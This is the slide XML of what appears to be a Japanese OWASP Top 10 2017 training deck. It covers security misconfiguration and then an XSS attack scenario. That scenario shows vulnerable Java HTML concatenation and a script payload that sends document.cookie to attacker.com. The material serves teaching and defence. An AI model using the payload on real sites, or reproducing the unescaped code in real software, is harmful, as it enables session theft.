              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>繰り返し強化するプロセスは、簡単にすぐ他の環境に展開され、正しくロックダウンすること。開発や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>QA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、本番環境は完全に同じように設定し、それぞれの環境で別々の認証情報を使用すること。このプロセスを自動化し、新しい安全な環境をセットアップする際には、手間を最小限にすること。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>プラットフォームは最小限のものとし、必要のない機能やコンポーネント、ドキュメント、サンプルを除くこと。使用しない機能とフレームワークは、削除もしくはインストールしないこと。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>レビューを実施して、セキュリティ関連の記録と更新の全てに加え、パッチを管理するプロセスの一環としてパッチの設定を適切に更新すること</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A9:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>既知の脆弱性のあるコンポーネントの使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> を参照</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。クラウドストレージのパーミッションは、詳細にレビューすること </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例えば、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>S3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>バケットのパーミッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>セグメント化したアプリケーションアーキテクチャは、セグメンテーションやコンテナリゼーション、クラウドのセキュリティグループ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(ACL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>をともなったコンポーネントやテナント間に、効果的で安全な仕切りをもたらす。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>セキュリティディレクティブをクライアントへ送ること。例えば </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>セキュリティヘッダー</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>プロセスを自動化して設定の有効性を検証し、環境すべてに適用すること。</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A6</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不適切なセキュリティ設定</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167097593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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>悪用のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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0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bg2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>蔓延度</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>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2"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>検出のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術面</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gn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>攻撃者は、パッチを当てていない穴を悪用したり、デフォルトのアカウントや使われていないページ、保護されていないファイルやディレクトリなどにアクセスし、権限無しにアクセスしたり、システム情報を取得したりします。</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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>不適切なセキュリティの設定は、どのレベルのアプリケーションスタックにも起こりえます。それはネットワークサービスやプラットフォーム、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>サーバ、アプリケーションサーバ、データベース、フレームワーク、カスタムコード、プレインストールしてある仮想マシンやコンテナ、ストレージです。自動化したスキャナーは、不適切な設定、つまりデフォルトのアカウントや設定、必要のないサービスやレガシーなオプションなどが使われているのを見つけるのに便利です。</a:t>
                      </a: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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>この欠陥によって、攻撃者は得てして権限無しにシステムのデータや機能にアクセスしてしまいます。場合によっては、そのような欠陥によってシステム全体が損なわれてしまいます。 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ビジネスへの影響は、アプリケーションとデータにどの程度保護が必要とされているかによります。</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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃シナリオの例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>あるアプリケーションは、検証やエスケープをせず、信頼出来ないデータを使用して、以下の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>スニペットを生成しています。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' type='TEXT'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("CC") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃者はブラウザでパラメータ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CC’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を以下に改変します</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  foo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>​これにより、被害者のセッション</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
